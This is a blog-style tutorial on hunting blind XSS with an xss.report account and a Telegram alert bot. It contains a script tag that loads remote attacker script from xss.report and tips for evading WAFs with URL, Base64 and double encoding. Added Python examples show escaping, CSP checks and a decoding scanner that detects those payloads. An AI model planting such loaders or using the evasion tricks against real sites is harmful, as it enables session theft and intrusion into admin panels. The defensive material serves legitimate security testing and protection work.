Blind XSS Telegram alert

Hunting for Blind XSS can be tricky because you need a server that runs 24/7 and is ready to receive any payload that fires on the admin's screen.

So, after a lot of research and testing, here is the best option I found that does not require a paid subscription.

Steps

  1. Create a new account at: https://xss.report/register

  2. After that, you will need to activate the Telegram bot to receive an alert when your payload fires.

  3. Copy your token from the dashboard: https://xss.report/dashboard#settings

  4. Go to https://t.me/XssReport_bot and select “Start Bot”

  5. Then enable the bot by providing your token

  6. The last step is to test the full setup.

  7. Copy the first payload from your payloads list on the dashboard.

Create a new file and make sure it has the .html extension

<!-- BXSS.html: replace "username" with the value from your own payload list -->

<script src="https://xss.report/c/username"></script>

Then open the file in the browser. At this point, you should receive an alert from the Telegram bot.

To view all of the details of the affected target, you should access the full report from the dashboard: https://xss.report/dashboard#settings

Example report

Because a Blind XSS payload usually fires inside the admin's internal dashboard, the finding is typically classified as P1 or P2.
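The reason the loader above runs at all is that a back-office page interpolates a stored, user-controlled value into its HTML without output encoding, and nothing stops the browser from fetching script from an arbitrary host. The following is an added example (not part of the original post or of xss.report) showing the receiving side: the same stored value rendered unsafely and with contextual escaping, a check for off-origin script sources in the rendered fragment, and a minimal Content-Security-Policy script-src evaluator. The admin origin, the CDN host and the stored field value are constructed for the example; the script tag is the one from the post.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample: a value left in a user-controlled field (display name,
# user agent, ticket body, ...) that an internal dashboard later renders.
STORED_FIELD = '<script src="https://xss.report/c/username"></script>'
ADMIN_ORIGIN = "https://admin.example.com"  # hypothetical back-office origin

# Finds <script ... src=...> and captures the src value (quoted or not).
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def render_unsafe(value):
    """Template that interpolates the stored value verbatim (the bug)."""
    return f"<td>{value}</td>"


def render_safe(value):
    """Same template with HTML output encoding: the browser shows text, runs nothing."""
    return f"<td>{html.escape(value, quote=True)}</td>"


def external_script_sources(fragment, own_origin):
    """Return every script src in a rendered fragment that points off-origin."""
    own = urlsplit(own_origin)
    found = []
    for src in SCRIPT_SRC_RE.findall(fragment):
        parts = urlsplit(src)
        if parts.netloc and (parts.scheme, parts.netloc) != (own.scheme, own.netloc):
            found.append(src)
    return found


def csp_allows_script(csp_header, script_url, own_origin):
    """Minimal script-src evaluator: handles 'self', 'none', '*' and host sources.
    Nonces, hashes and 'strict-dynamic' are deliberately not modelled."""
    directives = {}
    for directive in csp_header.split(";"):
        parts = directive.split()
        if parts:
            directives[parts[0].lower()] = parts[1:]
    # script-src falls back to default-src; with neither present, everything is allowed.
    sources = directives.get("script-src", directives.get("default-src", ["*"]))
    target = urlsplit(script_url)
    own = urlsplit(own_origin)
    for src in sources:
        if src == "'none'":
            return False
        if src == "*":
            return True
        if src == "'self'":
            if (target.scheme, target.netloc) == (own.scheme, own.netloc):
                return True
            continue
        if src.startswith("'"):
            continue  # keyword sources other than the ones above are ignored here
        allowed = urlsplit(src if "://" in src else f"{target.scheme}://{src}")
        if (allowed.scheme, allowed.netloc) == (target.scheme, target.netloc):
            return True
    return False


if __name__ == "__main__":
    print(external_script_sources(render_unsafe(STORED_FIELD), ADMIN_ORIGIN))
    print(external_script_sources(render_safe(STORED_FIELD), ADMIN_ORIGIN))
    strict = "default-src 'self'; script-src 'self' https://cdn.example.com"
    print(csp_allows_script(strict, "https://xss.report/c/username", ADMIN_ORIGIN))
```

Output encoding is the fix; the CSP is the second line of defence that limits the damage when a template is missed, and the off-origin check is the kind of assertion a template test can run over rendered admin pages.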

Additional tips

Sometimes the WAF will block your Blind XSS payloads; you can bypass that by submitting the same payload after encoding it with URL or Base64 encoding.

If the WAF still blocks your request, you can try double URL-encoding.
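The encoding tricks above work against a filter that decodes its input exactly once (or not at all) before matching. The following is an added example (not from the original post) of the detection side: a scanner for stored input that decodes layered URL encoding to a fixed point and tries a Base64 decode before pattern matching, run next to a one-pass filter so the difference is visible. The samples are constructed here from the loader tag in the post using the standard library; the pattern list is a minimal illustration, not a complete XSS signature set.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote

# Patterns checked once the value has been reduced to its plain form.
SCRIPT_RE = re.compile(r"<\s*script\b|javascript\s*:", re.I)

# Constructed samples: the loader tag from the post in the forms the tips mention,
# plus one benign URL-encoded value.
PAYLOAD = "<script src=https://xss.report/c/username></script>"
SAMPLES = {
    "plain": PAYLOAD,
    "url_once": quote(PAYLOAD, safe=""),
    "url_twice": quote(quote(PAYLOAD, safe=""), safe=""),
    "base64": base64.b64encode(PAYLOAD.encode()).decode(),
    "benign": "caf%C3%A9%20au%20lait",
}


def naive_is_suspicious(value):
    """A filter that URL-decodes exactly once before matching: double encoding
    and Base64 both slip past it."""
    return bool(SCRIPT_RE.search(unquote(value)))


def normalize(value, max_rounds=5):
    """Strip layered URL encoding by decoding until the value stops changing.
    The round limit keeps a hostile input from keeping the loop busy."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def try_base64(value):
    """Decode as Base64 only when the whole value looks like Base64, so ordinary
    text is never misread; return None otherwise."""
    if not re.fullmatch(r"[A-Za-z0-9+/]{16,}={0,2}", value):
        return None
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def is_suspicious(value):
    """Match against every plain form the value can be reduced to."""
    plain = normalize(value)
    candidates = [plain]
    decoded = try_base64(plain)
    if decoded is not None:
        candidates.append(normalize(decoded))
    return any(SCRIPT_RE.search(c) for c in candidates)


def scan(samples):
    """Run both checks over name -> raw value; returns name -> (naive, robust)."""
    return {name: (naive_is_suspicious(v), is_suspicious(v)) for name, v in samples.items()}


if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name:10s} one-pass={verdict[0]!s:5s} fixed-point={verdict[1]}")
```

The same idea applies on the WAF side: normalize to a canonical form first, then match, and treat a value that still contains percent-encoded bytes after the round limit as suspicious in its own right.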

Follow for more: https://x.com/__the7th